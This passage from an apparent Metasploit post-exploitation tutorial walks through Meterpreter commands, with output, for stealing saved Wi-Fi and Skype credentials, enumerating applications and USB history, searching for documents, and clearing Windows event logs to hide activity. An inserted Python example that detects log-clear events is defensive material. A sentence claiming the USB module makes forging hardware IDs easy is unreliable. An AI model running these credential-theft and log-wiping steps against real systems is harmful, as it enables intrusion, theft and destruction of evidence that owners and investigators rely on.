1. Collect wireless SSID information

run post/windows/wlan/wlan_bss_list

meterpreter > run post/windows/wlan/wlan_bss_list

2. Collect saved Wi-Fi passwords

run post/windows/wlan/wlan_profile

This collects the Wi-Fi login credentials saved on the target system.

meterpreter > run post/windows/wlan/wlan_profile

3. Get the list of installed applications

run get_application_list

meterpreter > run get_application_list

[!] Meterpreter scripts are deprecated. Try post/windows/gather/enum_applications.
[!] Example: run post/windows/gather/enum_applications OPTION=value [...]

Installed Applications
======================

Name Version
---- -------
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 9.0.30729.4148
Radmin Server 3.5 3.50.0000
WebFldrs XP 9.50.7523


meterpreter >

4. Get Skype passwords

run post/windows/gather/credentials/skype

meterpreter > run post/windows/gather/credentials/skype

5. Get USB usage history

run post/windows/gather/usb_history

meterpreter > run post/windows/gather/usb_history

[*] Running module against LIUYAZHUANG
[*]
D: IDE#CdRomNECVMWar_VMware_IDE_CDR10_______________1.00____#3031303030303030303030303030303030303130#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
E: Disk 31ac31ab

[-] No USB devices appear to have been connected to this host.
meterpreter >

With this module it is easy to forge a USB descriptor and hardware ID.

6. Search for files

meterpreter > search -f *.doc
Found 6 results...
c:\Documents and Settings\Default User\Templates\winword.doc (4608 bytes)
c:\Documents and Settings\Default User\Templates\winword2.doc (1769 bytes)
c:\Documents and Settings\lyz\Templates\winword.doc (4608 bytes)
c:\Documents and Settings\lyz\Templates\winword2.doc (1769 bytes)
c:\WINDOWS\system32\config\systemprofile\Templates\winword.doc (4608 bytes)
c:\WINDOWS\system32\config\systemprofile\Templates\winword2.doc (1769 bytes)
meterpreter >

7. Clear the logs on the target system

clearev

meterpreter > clearev
[*] Wiping 190 records from Application...
[*] Wiping 286 records from System...
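
Seen from the monitoring side, a wipe like the one above leaves its own record: Windows writes event 1102 (517 on XP/2003) to the Security log when that log is cleared, and event 104 to the System log when another log is cleared. The following is an added example, not part of the original page or of Metasploit; the record fields (`host`, `time`, `log`, `id`, `target`) are an assumed export schema from a log collector, and the sample records are constructed.

```python
from datetime import datetime, timedelta

# Event IDs Windows writes when a log is cleared:
# 1102 = Security log cleared (Vista and later), 517 = the same on XP/2003,
# 104  = another log (System, Application, ...) cleared, recorded in System.
CLEAR_IDS = {("Security", 1102), ("Security", 517), ("System", 104)}

# Constructed sample records in an assumed collector export format;
# "target" is the log that was cleared.
SAMPLE = [
    {"host": "WS01", "time": "2024-05-01T10:00:03", "log": "System", "id": 104, "target": "Application"},
    {"host": "WS01", "time": "2024-05-01T10:00:04", "log": "System", "id": 104, "target": "System"},
    {"host": "WS01", "time": "2024-05-01T10:00:04", "log": "Security", "id": 1102, "target": "Security"},
    {"host": "WS02", "time": "2024-05-01T11:30:00", "log": "System", "id": 104, "target": "Application"},
    {"host": "WS02", "time": "2024-05-01T11:31:00", "log": "System", "id": 7036, "target": None},
    {"host": "WS02", "time": "2024-05-01T15:00:00", "log": "System", "id": 104, "target": "System"},
]

def find_log_clears(records, window=timedelta(seconds=60)):
    """Group log-clear events per host into bursts no longer than `window`.

    Returns (host, first_seen, cleared_logs, severity) tuples. A burst that
    wipes two or more logs, as a bulk clear does, is rated "high".
    """
    clears = sorted(
        ((r["host"], datetime.fromisoformat(r["time"]), r["target"])
         for r in records if (r["log"], r["id"]) in CLEAR_IDS),
        key=lambda c: c[:2],  # order by host, then time
    )
    bursts = []
    for host, ts, target in clears:
        last = bursts[-1] if bursts else None
        if last and last["host"] == host and ts - last["start"] <= window:
            last["logs"].add(target)  # same burst: another log wiped
        else:
            bursts.append({"host": host, "start": ts, "logs": {target}})
    return [
        (b["host"], b["start"].isoformat(), sorted(b["logs"]),
         "high" if len(b["logs"]) >= 2 else "medium")
        for b in bursts
    ]

if __name__ == "__main__":
    for alert in find_log_clears(SAMPLE):
        print(alert)
```

This only works on records that were forwarded off the host before the wipe, since the local copies are gone.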

Another module for working with logs is event_manager

meterpreter > run event_manager 
Meterpreter Script for Windows Event Log Query and Clear.

OPTIONS:

-c <opt> Clear a given Event Log (or ALL if no argument specified)
-f <opt> Event ID to filter events on
-h Help menu
-i Show information about Event Logs on the System and their configuration
-l <opt> List a given Event Log.
-p Supress printing filtered logs to screen
-s <opt> Save logs to local CSV file, optionally specify alternate folder in which to save logs

meterpreter >
meterpreter > run event_manager -i
[*] Retriving Event Log Configuration

Event Logs on System
====================

Name Retention Maximum Size Records
---- --------- ------------ -------
Application Disabled 524288K 0
Security Disabled 524288K Access Denied
System Disabled 524288K 0
ThinPrint Diagnostics Disabled K 1


meterpreter > run event_manager -c
[-] You must specify and eventlog to query!
[*] Application:
[*] Clearing Application
[*] Event Log Application Cleared!
[*] Security:
[*] Clearing Security
[-] Failed to Clear Security, Access Denied
[*] System:
[*] Clearing System
[*] Event Log System Cleared!
[*] ThinPrint Diagnostics:
[*] Clearing ThinPrint Diagnostics
[*] Event Log ThinPrint Diagnostics Cleared!
meterpreter >
meterpreter >
meterpreter > run event_manager -i
[*] Retriving Event Log Configuration

Event Logs on System